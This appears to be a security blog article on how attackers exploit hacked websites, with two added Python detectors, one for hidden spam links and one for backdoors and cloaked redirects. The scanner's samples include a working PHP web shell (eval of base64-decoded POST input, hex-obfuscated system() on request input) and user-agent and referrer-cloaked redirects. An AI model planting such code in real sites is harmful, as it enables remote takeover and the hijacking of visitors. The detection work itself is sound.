Hacked Websites Target Your Customers
Malicious software (malware) is used to infect websites, gather data and, in some cases, hijack computing resources. A site to which an attacker has gained access can be used to redirect traffic, infect visitors with unwanted software and, more recently, use visitors' computers to mine cryptocurrencies that are difficult to trace.
There are thousands of types of malware and thousands of ways to infect a website, most of them carried out by automated hacking tools. What they all have in common is that hacked websites are mostly used to target your potential customers: your website visitors.
The number of hacked sites rises rapidly
“There was a 32 percent increase in the number of hacked sites in 2016 compared to 2015.”
– Google Webmaster Central Blog
Botnet-enabled attacks on vulnerable web applications accounted for more breaches (571) than any other vector in Verizon's 2017 Data Breach Investigations Report. In March 2016 Google announced that more than 50 million websites worldwide were infected or malicious; in March 2015 that number was 17 million. The number of new web application vulnerabilities published in 2017 was 212% higher than the number disclosed in 2016.
Business Reputation Loss and Drop In Revenue
A hacked website costs you your customers' trust, and that translates into reputational damage for the company; for an e-commerce business it can mean the end of the business.
Once your site is hacked and added to various blacklists, potential customers can no longer reach the products or services you offer.
Google and other search engines (whose warning lists you do not want to be on) warn your customers and steer them away from your website. Google has since raised the bar further: since July 2018 (Chrome 68), Chrome marks every page served over plain HTTP, without TLS, as "Not secure" in the address bar, and Google has used HTTPS as a search ranking signal since 2014, which makes it harder for a company without HTTPS to reach new customers.
In any case, if a potential customer visits your site and is warned or infected, the chance that they will ever return is extremely low.
Website clean-up is more expensive than protection
As a website owner who has discovered that the site has been hacked, the first thing you will probably do is search for "how to clean up a hacked site". You will find plenty of blog posts and articles, but they all eventually recommend the same thing: have a professional do it for you.
Cleaning malware out of a website is much more about knowing the vulnerabilities and thinking the way an attacker does than about manually going through the files. Malware is often hidden inside legitimate files and in the database, and attackers put considerable effort into making sure their backdoors are not easy to remove; a clean-up that misses a single backdoor is undone as soon as the attacker reconnects.
Expensive, indeed. It is not just the cost of the clean-up service itself: the lost revenue and reputational damage can take a lot of time and money to recover from.
Website gets blacklisted
What is the Blacklist?
Without using the exact term "blacklist", Google quarantines at least 10,000 suspicious websites each day. You can recognize such sites by the message "This site may harm your computer" next to them in search results, a warning that prompts most users to stay away. Consumers are grateful for the warning; the business panics. (source: Forbes)
Cleaning up your site is only the first step towards being relisted by Google. Before you put your site back out there, make sure you have measures in place to prevent a recurrence: if you do not tighten your security, you remain exposed to the same attackers who compromised your site the first time.
Using Your Server to Run Their Own Programs
If you’re running a WordPress site, your web server is most likely a fully functioning Linux server with MySQL and PHP installed. Depending on your hosting situation, it may also have a meaningful amount of processing power.
In December, we wrote about a massive cryptomining campaign targeting WordPress sites. In the most intense period of attacks we had ever recorded, an attacker was compromising sites and using them to both attack other WordPress sites and to mine for Monero, a cryptocurrency that can be mined efficiently using web server hardware.
I encourage you to read the article if you haven't already. We were able to identify how the attackers were controlling the compromised servers and found evidence that they had earned almost $100k from their mining.
Leveraging Your Reputation
In November, we wrote about the fact that your site reputation makes you a target. I encourage you to read it along with the post that inspired it, by Troy Hunt.
Hosting Phishing Pages
A phishing page is one that attempts to fool you into sharing sensitive information such as your password, credit card number or social security number. A typical example is a fake login page that gives you the impression you are on, say, the Gmail login screen. You enter your credentials, the attacker logs them and can now sign in to your real Gmail account and steal data.
In January 2017, we wrote about a new and highly effective Gmail phishing technique that was having a wide impact.
Because your site has a clean reputation, services like Google Safe Browsing that would normally warn users about suspicious sites have no reason to flag it, so a phishing page hosted on your domain is served to victims without any warning until the abuse is reported and the site is blacklisted.
Hosting Spam Pages and Injecting Spammy Links
Your site is legitimate, so search engines like Google assume that your content, including outbound links, is also legitimate. Attackers love to plant SEO spam in the form of pages and links on your site, boosting SEO rankings for their malicious businesses.
A great example of this is the supply chain attack we discovered back in September that spanned 4.5 years and impacted 9 WordPress plugins. In our blog post about this SEO spam campaign, we exposed how someone purchased the plugins and then used them to embed spammy links in the sites that were running them. The attacker used these links to improve search engine rankings for websites offering payday loans, escort services and other shady things.
It’s important to remember that while your site alone isn’t capable of boosting an attacker’s SEO results, thousands of compromised sites can really move the needle.
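The injected spam links described above are almost always hidden from human visitors (off-screen positioning, display:none, zero font size or the HTML5 hidden attribute) while staying in the markup that crawlers index. As an added example, which is not code from the original article or from the plugins it mentions, the following Python script parses a page as served and reports outbound anchors that are hidden by inline CSS or the hidden attribute. The sample HTML, the spam hostnames and the site_host argument are constructed for the demo, and the HIDDEN_CSS list is my assumption about which inline styles count as hiding.

```python
"""Find outbound links hidden from human visitors, the usual shape of injected SEO spam.
Added example: parses the HTML as served and checks inline CSS and the hidden attribute."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline CSS fragments that hide an element from people but not from crawlers (assumed list).
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|opacity\s*:\s*0(?![.\d])"
    r"|font-size\s*:\s*0(?:px|em|%)?(?![.\d])"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)
# Void elements have no closing tag and must not be pushed on the ancestor stack.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link", "meta",
        "param", "source", "track", "wbr"}


class HiddenLinkFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.open_tags = []          # (tag, hidden_reason or None) for each open ancestor
        self.findings = []           # one dict per suspicious anchor
        self.current_finding = None  # finding whose anchor text is being collected

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        reason = None
        if "hidden" in attrs:                       # HTML5 boolean attribute
            reason = f"<{tag} hidden>"
        else:
            m = HIDDEN_CSS.search(attrs.get("style") or "")
            if m:
                reason = f"<{tag} style='{m.group(0)}'>"
        if tag == "a":
            href = attrs.get("href") or ""
            host = (urlparse(href).hostname or "").lower()
            # Only outbound links matter: that is what the attacker is selling.
            external = bool(host) and host != self.site_host
            inherited = reason or next((r for _, r in reversed(self.open_tags) if r), None)
            if external and inherited:
                self.current_finding = {"href": href, "reason": inherited, "text": ""}
                self.findings.append(self.current_finding)
        if tag not in VOID:
            self.open_tags.append((tag, reason))

    def handle_data(self, data):
        if self.current_finding is not None:
            self.current_finding["text"] += data

    def handle_endtag(self, tag):
        if tag == "a":
            self.current_finding = None
        for i in range(len(self.open_tags) - 1, -1, -1):  # pop back to the matching open tag
            if self.open_tags[i][0] == tag:
                del self.open_tags[i:]
                break


def find_hidden_links(html, site_host):
    """Return [{'href', 'reason', 'text'}, ...] for hidden outbound anchors in html."""
    p = HiddenLinkFinder(site_host)
    p.feed(html)
    p.close()
    for f in p.findings:
        f["text"] = " ".join(f["text"].split())
    return p.findings


# Constructed sample page: a visible nav plus an injected, off-screen spam block.
SAMPLE_HTML = """<html><body>
<nav><a href="/shop">Shop</a> <a href="https://twitter.com/example">Twitter</a></nav>
<p>Welcome to our store.</p>
<div style="position:absolute; left:-9999px;">
  <a href="http://cheap-loans.example/">payday loans online</a>
  <a href="http://pills.example/">buy pills</a>
</div>
<a href="http://escort.example/" style="display:none">escort services</a>
<img src="/logo.png"><a href="/about">About us</a>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_links(SAMPLE_HTML, "example.com"):
        print(f"{f['href']:<32} {f['reason']:<28} {f['text']!r}")
```

The script only sees inline styles; links hidden through an external stylesheet or by JavaScript need the computed style from a headless browser. Run it against the HTML as served to a search engine user agent as well as to a normal browser, because the same attackers often cloak the injected block by user agent.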
Sending Spam Email
Getting spam email past spam filters is hard. Mail providers use many techniques to identify and block spam, and almost all of them consult IP reputation lists (DNS-based blocklists) to reject everything sent from addresses already known to emit spam.
That is where your web server comes in. Not only does it have the hardware and software spammers need, but the reputation of its IP address is probably clean. By sending spam through your web server, criminals stand a much better chance of getting it delivered.
Eventually, spam filters pick up on what is happening and blacklist your IP as well, so the attacker simply moves on to the next victim, leaving the reputation of your IP address in ruins.
Attacking Other Sites
Sometimes attackers use compromised WordPress sites to attack other sites. We saw this in the cryptocurrency mining attack discussed earlier in this article, where an attacker controlled a botnet of thousands of other people's WordPress sites that were simultaneously mining cryptocurrency and attacking further websites. Your website is an attractive attack platform because its IP address is probably not on any blacklist.
Hosting Malicious Content
Hackers will sometimes use your web server to host malicious files that they can call from other servers. They are essentially using your hosting account as a file server.
Leveraging Your Site Traffic
One very common thing attackers do with hacked websites is add redirects. Visitors don't even have to click a link to end up on the spam site: the redirect takes them there directly. In some cases attackers redirect all of your traffic to malicious sites, but more often they take measures to avoid detection, redirecting only visitors who arrive from specific URLs (such as search engine result pages) or who use specific browsers or device types, while the site owner and search engine crawlers keep seeing the normal page.
In some cases, the attacker just wants to get a message out. By taking over your website they can reach your visitors, at least until you figure out what they have done. Attacks of this kind often represent a political cause or are simply after "street cred" in the hacker community.
In February last year, we saw a huge WordPress defacement campaign that exploited a WordPress REST API vulnerability (the unauthenticated content injection flaw in WordPress 4.7.0 and 4.7.1, fixed in 4.7.2). It grew at incredible speed over a period of days, and after just 24 hours we had tracked 19 separate attack campaigns significantly impacting WordPress sites.
One especially nefarious way attackers monetize hacked websites is to use them to spread malware. They inject code into your pages that delivers malware to your visitors' computers or devices when those pages are loaded.
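The cloaked redirects just described, and the backdoors hidden inside legitimate files that the clean-up section warns about, both leave recognisable traces in the PHP and .htaccess files of a WordPress install. As an added example, which is not code from the original article, the Python triage scanner below applies two kinds of check: per-line indicators of obfuscated PHP (eval of a decoded payload, hex-escaped function names, request parameters executed as code, long base64 blobs) and a file-level correlation that only reports a redirect when the same file also branches on the user agent or referrer, so a plugin that merely adapts a theme to mobile browsers does not trigger it. The sample files, paths and hostnames are constructed for the demo, and the rule set is my assumption about common indicators rather than an exhaustive signature list; scan_tree() applies the same rules to a real document root.

```python
"""Triage scanner for two artefacts attackers leave on a hacked PHP/WordPress host:
cloaked redirects (fired only for certain user agents or referrers) and obfuscated
backdoors hidden in otherwise legitimate files. Samples are constructed for the demo."""
import re
from dataclasses import dataclass
from pathlib import Path


@dataclass
class Finding:
    path: str
    line: int
    rule: str
    snippet: str


# Per-line indicators (assumed rule set). One hit deserves a look; several in one file rarely occur legitimately.
CODE_RULES = [
    ("eval-of-decoded-payload",
     re.compile(r"\b(?:eval|assert)\s*\(\s*@?(?:base64_decode|gzinflate|gzuncompress|"
                r"gzdecode|str_rot13|strrev)\s*\(", re.I)),
    ("preg_replace-e-modifier",  # /e evaluated the replacement as PHP (removed in PHP 7)
     re.compile(r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
    ("request-input-to-exec",
     re.compile(r"\b(?:eval|system|exec|shell_exec|passthru|popen|proc_open|"
                r"create_function)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("request-value-called-as-function",  # $_GET['f']($_GET['a'])
     re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(")),
    ("hex-escaped-identifier",  # "\x65\x76\x61\x6c" spells eval
     re.compile(r"(?:\\x[0-9a-f]{2}){4,}", re.I)),
    ("long-base64-blob",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]

# File-level correlation: a condition on the request (user agent or referrer) AND a
# redirect primitive in the same file. Either one alone is common in legitimate code.
REQUEST_CONDITION = re.compile(r"HTTP_USER_AGENT|HTTP_REFERER", re.I)
REDIRECT = re.compile(
    r"header\s*\(\s*['\"]\s*Location\s*:|wp_redirect\s*\(|window\.location"
    r"|RewriteRule\s+\S+\s+https?://", re.I)


def scan_text(path, text):
    """Return Findings for one file's content; line numbers are 1-based."""
    findings = []
    lines = text.splitlines()
    for n, line in enumerate(lines, 1):
        for rule, rx in CODE_RULES:
            if rx.search(line):
                findings.append(Finding(path, n, rule, line.strip()[:80]))
    if any(REQUEST_CONDITION.search(ln) for ln in lines):
        for n, line in enumerate(lines, 1):
            if REDIRECT.search(line):
                findings.append(Finding(path, n, "cloaked-redirect", line.strip()[:80]))
    return findings


def scan_tree(root):
    """Apply scan_text to every PHP/JS/HTML file and .htaccess under a real docroot."""
    out = []
    for p in Path(root).rglob("*"):
        if p.is_file() and (p.suffix in (".php", ".js", ".html") or p.name == ".htaccess"):
            out.extend(scan_text(str(p), p.read_text(errors="replace")))
    return out


# Constructed samples (paths and hostnames are made up for the demo).
SAMPLES = {
    "wp-content/themes/twentyseventeen/footer.php": """<?php
// Theme footer; the block below was appended by the attacker (constructed sample).
if (stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') === false &&
    preg_match('/android|iphone/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('Location: http://bad-redirect.example/?r=' . $_SERVER['HTTP_HOST']);
    exit;
}
""",
    ".htaccess": r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule ^(.*)$ http://spam-landing.example/ [R=302,L]
""",
    "wp-content/uploads/2018/01/cache.php": r"""<?php
@eval(base64_decode($_POST['c']));
$f = "\x73\x79\x73\x74\x65\x6d"; // "system" spelled in hex escapes
$f($_REQUEST['cmd']);
$p = '""" + "QUJD" * 60 + "';\n",
    "wp-content/plugins/mobile-helper/mobile.php": """<?php
// Legitimate-looking plugin: reads the user agent but never redirects on it.
$is_mobile = (bool) preg_match('/Mobile|Android/i', $_SERVER['HTTP_USER_AGENT']);
add_filter('body_class', function ($c) use ($is_mobile) { return $is_mobile ? array_merge($c, ['mobile']) : $c; });
""",
}


def scan_samples():
    """Run the rules over the embedded samples, keyed by sample path."""
    return {path: scan_text(path, text) for path, text in SAMPLES.items()}


if __name__ == "__main__":
    for path, found in scan_samples().items():
        print(f"{path}: {len(found)} finding(s)")
        for f in found:
            print(f"  line {f.line:>3}  {f.rule:<34} {f.snippet}")
```

Findings are leads for manual review, not verdicts: compare any flagged core, theme or plugin file against a clean copy of the same version, and remember that this scanner covers files only, whereas the same campaigns also store payloads in the database (for example in wp_options or post content), which needs a separate query-based check.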
As a site owner, this is especially scary, as not only do you risk having your site flagged by search engines and other blacklists, but your visitors are not going to be happy with you. Your reputation, both online and with your site visitors, could be damaged for a long time. In addition, a hacked website can have a long-term negative impact on your search engine rankings.
Even if you don't take credit card payments on your site, an attacker may still find data worth stealing. Anything captured through forms on your site (contact details, account sign-ups, newsletter addresses) may be valuable. Stolen username and password pairs are also tried against other sites (credential stuffing), because many people reuse the same password.
We’ve learned over the years that websites almost always represent something that matters to people, even if it’s not a business site. Unfortunately, cybercriminals have, too. Last year we wrote about a ransomware attack campaign targeting WordPress sites. While we haven’t seen much of this lately, we believe the threat of WordPress ransomware will continue and will increase in future.